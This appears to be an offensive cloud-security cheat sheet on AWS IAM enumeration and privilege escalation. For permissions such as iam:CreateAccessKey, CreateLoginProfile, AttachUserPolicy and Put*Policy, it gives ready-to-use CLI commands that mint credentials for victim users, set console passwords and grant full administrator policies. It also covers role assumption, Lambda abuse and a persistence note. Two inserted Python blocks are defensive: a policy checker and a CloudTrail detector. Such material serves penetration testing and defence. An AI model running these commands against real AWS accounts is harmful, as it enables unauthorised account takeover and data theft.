IAM
IAM privileges - Privesc
Unauthenticated IAM Enumeration
IAM User Accounts
AWeSomeUserFinder
Uses UpdateAssumeRolePolicy to identify external IAM users.
python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -rn <role name> -a <account id>
Modify S3 bucket policies to enumerate valid IAM users in external accounts
python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -s3 -b <bucket_name> -a <account id>
Pacu
run iam__enums --role-name <your assumed role> --account-id <account id>
IAM Privilege escalation
List inline policies, attached policies and group policies
IAM Enumeration Tools
PMapper
CloudPEASS
python3 AWSPEAS.py --profile <AWS_PROFILE> --region <AWS_REGION>

IAMActionHunter

IAMFinder
EnumerateIAM
python3 enumerate-iam.py --access-key [access_key] --secret-key [secret_key] > results.txt
aws_iam_enum
python3 iam-enum.py --user-name [username] --profile [profile]

aws_escalate.py
python3 aws_escalate.py --user-name [username] --access-key-id [access_key] --secret-key [secret_key]
Pacu
Privilege escalation opportunities in IAM configurations
Multiple privesc vectors
Multiple privesc vectors in a single policy
lambda:UpdateFunctionConfiguration
iam:PassRole + ec2:RunInstances: Creating an EC2 instance with an existing instance profile
iam:CreateAccessKey: Creating a new user access key
iam:CreateLoginProfile: Creating a new login profile
iam:UpdateLoginProfile: Updating an existing login profile
iam:AttachUserPolicy: Attaching a policy to a user
iam:AttachGroupPolicy: Attaching a policy to a group
iam:AttachRolePolicy: Attaching a policy to a role
iam:PutUserPolicy: Creating/updating an inline policy for a user
iam:PutGroupPolicy: Creating/updating an inline policy for a group
iam:PutRolePolicy: Creating/updating an inline policy for a role
iam:AddUserToGroup: Adding a user to a group
iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction: Passing a role to a new Lambda function, then invoking it
iam:PassRole + lambda:CreateFunction + lambda:AddPermission
iam:UpdateAssumeRolePolicy + sts:AssumeRole: Updating the AssumeRolePolicyDocument of a role
lambda:UpdateFunctionCode: Updating the code of an existing Lambda function
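The vectors listed above are what tools like PMapper and aws_escalate.py look for. The following is an added example (not code from the page or from those tools) of a minimal static check: it takes an IAM policy document, expands the `*`/`?` wildcards IAM allows in `Action`, and reports which of the listed vectors the policy grants. It deliberately ignores `Resource`, `Condition` and `NotAction`, so treat its output as a triage list, not a verdict.

```python
import fnmatch
import json

# Privilege-escalation vectors from the list above; every action in a tuple
# must be allowed for that vector to apply. Added example, not tooling from
# the original page.
VECTORS = [
    ("lambda:UpdateFunctionConfiguration",), ("lambda:UpdateFunctionCode",),
    ("iam:PassRole", "ec2:RunInstances"),
    ("iam:CreateAccessKey",), ("iam:CreateLoginProfile",), ("iam:UpdateLoginProfile",),
    ("iam:AttachUserPolicy",), ("iam:AttachGroupPolicy",), ("iam:AttachRolePolicy",),
    ("iam:PutUserPolicy",), ("iam:PutGroupPolicy",), ("iam:PutRolePolicy",),
    ("iam:AddUserToGroup",), ("iam:CreatePolicyVersion",), ("iam:SetDefaultPolicyVersion",),
    ("iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"),
    ("iam:PassRole", "lambda:CreateFunction", "lambda:AddPermission"),
    ("iam:UpdateAssumeRolePolicy", "sts:AssumeRole"),
]

def _as_list(value):
    """IAM lets Statement/Action be a single item or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]

def _matches(action, patterns):
    """IAM action matching: case-insensitive, '*' and '?' wildcards (e.g. iam:Put*Policy)."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def find_privesc_vectors(policy_json):
    """Return the vectors whose actions are all Allowed and none explicitly Denied.
    Simplification: Resource and Condition are ignored, so a narrow Deny counts as
    a full Deny and a narrow Allow as a full Allow; NotAction is not handled."""
    allowed, denied = [], []
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        bucket = allowed if stmt.get("Effect") == "Allow" else denied
        bucket.extend(_as_list(stmt.get("Action", [])))
    return [" + ".join(v) for v in VECTORS
            if all(_matches(a, allowed) and not _matches(a, denied) for a in v)]

# Constructed sample: looks scoped, but the wildcards grant six vectors.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:PassRole", "lambda:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:Put*Policy", "Resource": "*"},
        {"Effect": "Deny", "Action": "lambda:InvokeFunction", "Resource": "*"},
    ],
})

if __name__ == "__main__":
    for hit in find_privesc_vectors(SAMPLE_POLICY):
        print("privesc vector granted:", hit)
```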
iam:CreateAccessKey
An attacker with the iam:CreateAccessKey permission on other users can create an access key ID and secret access key belonging to another user in the AWS environment.
aws iam create-access-key --user-name target_user

$ aws iam create-access-key --user-name [Victim-Username] --profile [profile-name] --output text | tee creds.txt

iam:CreateLoginProfile
An attacker with the iam:CreateLoginProfile permission on other users can create a password to log in to the AWS console as any user that does not already have a login profile set up.
aws iam create-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]


arn:aws:iam::[Account_ID]:user/[Username]
You can now login as the victim into the AWS console
iam:UpdateLoginProfile
aws iam update-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]
You can now login as the victim into the AWS console - See iam:CreateAccessKey
iam:CreatePolicyVersion
An attacker with this permission can create a new version of an IAM policy they have access to and set it as the default version.
aws iam create-policy-version --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy --policy-document file://path/to/administrator/policy.json --set-as-default
administrator/policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
iam:SetDefaultPolicyVersion
aws iam set-default-policy-version --policy-arn target_policy_arn --version-id v2
Where "v2" is the policy version with the most privileges available.
Example: CloudGOAT - iam_privesc_by_rollback
With Pacu:


iam:AddUserToGroup
aws iam add-user-to-group --group-name [group-name] --user-name [username] --profile [profile]
iam:AttachUserPolicy
aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
If attaching AdministratorAccess fails, try to attach another dangerous permission such as SecretsManagerReadWrite
aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
iam:AttachGroupPolicy
aws iam attach-group-policy --group-name [group_attached_to_user] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
Also try with AdministratorAccess - See iam:AttachUserPolicy
iam:PutUserPolicy
Create a policy document policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
aws iam put-user-policy --user-name [username] --policy-name test --policy-document file://policy.json
Check if the policy is in place:
$ aws iam list-user-policies --user-name [username]
$ aws iam get-user-policy --user-name [username] --policy-name test
iam:PutGroupPolicy
Create policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
Upload the policy to your group
aws iam put-group-policy --group-name [group] --policy-name admin --policy-document file://policy.json
iam:AttachRolePolicy
Find a role you can assume: "Action": "sts:AssumeRole"
aws iam list-roles
Attach Role Policy
aws iam attach-role-policy --role-name [role_you_can_assume] --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess
iam:PutRolePolicy
Find a role you can assume - See iam:AttachRolePolicy
Create policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
Put the role
aws iam put-role-policy --role-name [role_you_can_assume] --policy-name secretsaccess --policy-document file://policy.json
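Every command in the sections from iam:CreateAccessKey through iam:PutRolePolicy above lands in CloudTrail as an IAM API call. The following is an added example (not from the page) of the detection logic a defender would run over those records: credential-minting calls are flagged only when the caller and the target user differ (self-service key rotation is routine), and policy-changing calls are flagged outright, with the AdministratorAccess attachment and "set as default" cases called out. The records are constructed to mimic the CloudTrail schema; the account ID and names are placeholders.

```python
# Actions from the sections above that mint another principal's credentials or
# change what a principal may do. Added example; SAMPLE_EVENTS are constructed
# records following the CloudTrail schema, not real log output.
CRED_ACTIONS = {"CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile"}
POLICY_ACTIONS = {"AttachUserPolicy", "AttachGroupPolicy", "AttachRolePolicy",
                  "PutUserPolicy", "PutGroupPolicy", "PutRolePolicy",
                  "CreatePolicyVersion", "SetDefaultPolicyVersion",
                  "UpdateAssumeRolePolicy", "AddUserToGroup"}

def actor_of(event):
    """Caller identity: the IAM user name, or the session ARN for roles/root."""
    ident = event.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "unknown")

def suspicious_iam_events(records):
    """Return (eventName, actor, target, reason) for privesc-shaped IAM calls."""
    hits = []
    for ev in records:
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        name, actor = ev.get("eventName"), actor_of(ev)
        params = ev.get("requestParameters") or {}   # null when no args were sent
        target = (params.get("userName") or params.get("groupName")
                  or params.get("roleName") or params.get("policyArn") or actor)
        if name in CRED_ACTIONS and target != actor:
            hits.append((name, actor, target, "credentials minted for another user"))
        elif name in POLICY_ACTIONS:
            reason = "privilege change"
            if "policy/AdministratorAccess" in str(params.get("policyArn", "")):
                reason = "AdministratorAccess attached"
            elif name == "CreatePolicyVersion" and params.get("setAsDefault"):
                reason = "new policy version set as default"
            hits.append((name, actor, target, reason))
    return hits

SAMPLE_EVENTS = [  # constructed; 111122223333 is a placeholder account ID
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": None},                               # own key: routine
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "admin-bob"}},          # key for someone else
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/DeployRole/ci"},
     "requestParameters": {"userName": "admin-bob", "passwordResetRequired": False}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "alice",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
]
```

Feeding the same logic a CloudTrail export (one JSON record per line) instead of SAMPLE_EVENTS is the only change needed to run it on real data.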
sts:AssumeRole
List of IAM roles
aws iam list-roles
Retrieve trust relationship between role and user
aws iam get-role --role-name [role-name]
List managed policies attached to the specified role
aws iam list-attached-role-policies --role-name [role-name]
Retrieve information about the specified version of the managed policy
aws iam get-policy-version --policy-arn [policy-arn] --version-id [vid]
Assume role - retrieve temporary security credentials of assumed role
aws sts assume-role --role-arn [role-arn] --role-session-name [sessionname]
Use the credentials
$ export AWS_ACCESS_KEY_ID=[access_key]
$ export AWS_SECRET_ACCESS_KEY=[secret_key]
$ export AWS_SESSION_TOKEN=[session_token]
$ aws sts get-caller-identity
lambda:UpdateFunctionConfiguration
Allows attaching a layer to a function. The command below instead updates the function's code, which is the lambda:UpdateFunctionCode vector listed above:
aws lambda update-function-code --function-name [my-function] --zip-file fileb://my-function.zip
iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction
$ aws lambda create-function --function-name [function-name] --runtime python3.7 --zip-file fileb://my-function.zip --handler [my-function.handler] --role [role-arn] --region [region]
$ aws lambda invoke --function-name [function-name] response.json --region [region]
Persistence - IAM Roles Anywhere
An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account.
Interesting Books
Advanced Penetration Testing: Hacking AWS 2. This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment.
Hands-On AWS Penetration Testing with Kali Linux. Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud